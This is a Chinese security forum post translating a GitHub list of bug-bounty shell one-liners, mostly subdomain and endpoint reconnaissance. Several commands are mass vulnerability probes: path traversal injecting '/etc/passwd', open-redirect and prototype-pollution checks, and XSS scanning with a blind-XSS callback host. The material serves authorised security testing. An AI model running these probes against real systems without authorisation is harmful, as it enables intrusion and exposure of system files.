安全矩阵

 找回密码
 立即注册
搜索
查看: 2451|回复: 0

在挖洞的时候一些提高效率的命令

[复制链接]

65

主题

65

帖子

241

积分

中级会员

Rank: 3Rank: 3

积分
241
发表于 2022-5-2 15:01:57 | 显示全部楼层 |阅读模式
本帖最后由 PEnticE 于 2022-5-2 15:16 编辑

​原文地址;
https://github.com/dwisiswant0/awesome-oneliner-bugbounty

定义
本节定义了整个单行命令/脚本中使用的特定术语或占位符。
    1.1. "HOST "定义了一个主机名、(子)域或IP地址,例如,用internal.host、domain.tld、sub.domain.tld或127.0.0.1取代。
    1.2. "HOSTS.txt "包含标准1.1,在文件中超过一个。
    2.1. "URL "肯定定义了URL,例如被http://domain.tld/path/page.html,或者有点以HTTP/HTTPS协议开始。
    2.2. 2.2. "URLS.txt "包含标准2.1,在文件中不止一个。
    3.1. "FILE.txt "或 "FILE{N}.txt "是指根据上下文和需要运行命令/脚本所需的文件。
    4.1. "OUT.txt "或 "OUT{N}.txt "是指作为目标存储结果的文件将是被执行的命令。

本地文件包含 @dwisiswant0
  1. gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

开放式重定向 @dwisiswant0
  1. export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

@N3T_hunt3r
  1. cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy <a href="http://127.0.0.1:8080" target="_blank">http://127.0.0.1:8080</a> -sk > /dev/null<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

XSS @cihanmehmet
  1. gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

@fanimalikhack
  1. waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
复制代码


@oliverrickfors
  1. cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|")message(?:'|")"<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

原型链污染@R0X4R
  1. subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

查找 JavaScript 文件 @D0cK3rG33k
  1. assetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" | sed -e 's, 'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars"; done<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

从JavaScript中提取端点@renniepak
  1. cat FILE.js | grep -oh ""\/[a-zA-Z0-9_/?=&]*"" | sed -e 's/^"//' -e 's/"$//' | sort -u<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码
从目标列表中获取CIDR和组织信息@steve_mcilwain
  1. for HOST in $(cat HOSTS.txt);do echo $(for ip in $(dig a $HOST +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; done | uniq); done
复制代码

从RapidDNS.io获取子域名@andirrahmani1
  1. curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

从BufferOver.run获取子域@_ayoubfathi_

  1. curl -s <a href="https://dns.bufferover.run/dns?q=.HOST.com" target="_blank">https://dns.bufferover.run/dns?q=.HOST.com</a> | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

@AnubhavSingh_

  1. export domain="HOST"; curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$domain"<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

从Riddler.io获取子域名@pikpikcu
  1. curl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码
Get Subdomains from VirusTotal@pikpikcu

  1. curl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

用cyberxplore获取子域名@pikpikcu

  1. curl <a href="https://subbuster.cyberxplore.com/api/find?domain=HOST" target="_blank">https://subbuster.cyberxplore.com/api/find?domain=HOST</a> -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" <img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

从CertSpotter获取子域@caryhooper
  1. curl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

从Archive中获取子域@pikpikcu
  1. curl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

从JLDC获取子域@pikpikcu
  1. curl -s "https://jldc.me/anubis/subdomains/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

从securitytrails获取子域@pikpikcu
  1. curl -s "https://securitytrails.com/list/apex_domain/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

Bruteforcing Subdomain using DNS Over@pikpikcu
  1. while read sub; do echo "https://dns.google.com/resolve?name=$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent  | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ; done < FILE.txt<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

FFUF 的子域暴力破解器 @GochaOqradze
  1. ffuf -u <a href="https://FUZZ.HOST" target="_blank">https://FUZZ.HOST</a> -w FILE.txt -v | grep "| URL |" | awk '{print $4}'<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

从 IP 地址查找 ASN 的分配 IP 范围 wains.be

  1. whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net IP | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

从文件中提取 IP @emenalf
  1. grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

查找子域接管
  1. subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ;<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

使用 cURL + Parallel 进行 URL 探测

  1. cat HOSTS.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' -o /dev/null -skw<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

我个人觉得很有用的来了,注意哈。上面并不全,全的在原文,我翻译过来后,筛出来适合咱用的一些命令
转储范围内的资产 chaos-bugbounty-list@dwisiswant0
  1. curl -sL <a href="https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json" target="_blank">https://github.com/projectdiscov ... bugbounty-list.json</a> | jq -r '.programs[].domains | to_entries | .[].value'<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码


转储范围内的资产 bounty-targets-dataHackerOne 程序
  1. curl -sL <a href="https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true" target="_blank">https://github.com/arkadiyt/boun ... _data.json?raw=true</a> | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码


BugCrowd 程序
  1. curl -sL <a href="https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json" target="_blank">https://github.com/arkadiyt/boun ... /bugcrowd_data.json</a> | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

还有一些,在原文,hackerone的资产是每小时更新的可以进行差异化对比来获取到新的项目资产范围

从swagger.json提取端点 @zer0pwn  最常用的语句了
  1. curl -s https://HOST/v2/swagger.json | jq '.paths | keys[]'<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

查找隐藏的服务器和/或管理面板  这个依托与字典了
  1. ffuf -c -u URL -H "Host: FUZZ" -w FILE.txt<img width="15" _height="15" src="data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==" border="0" alt="">
复制代码

在你们用这些工具的时候最好开一台服务器来配置你们的工具环境变量,我用的centos缺什么从yum拉取或者你已经配置好了工具保证你的命令能够调用的到比如前面的subfinder,ffuf 不然的话会报错的,其余的命令看原文吧,重复利用的比较少
原文地址;
https://github.com/dwisiswant0/awesome-oneliner-bugbounty
侵权联系删除又到了我发牢骚的时候了,挖了一个月的hackerone,哇,重复率高达99%,或许是我太菜了,昨天的一个功能点的SQL注入都被忽略,直接懵逼,今天早上复测了一下发现跑不开了,我??????????又是朝着粉丝大佬们努力的一天
太菜了太菜了太菜了,菜到自闭兄弟们,顺便兄弟们劳动节快乐
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-30 07:54 , Processed in 0.013057 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表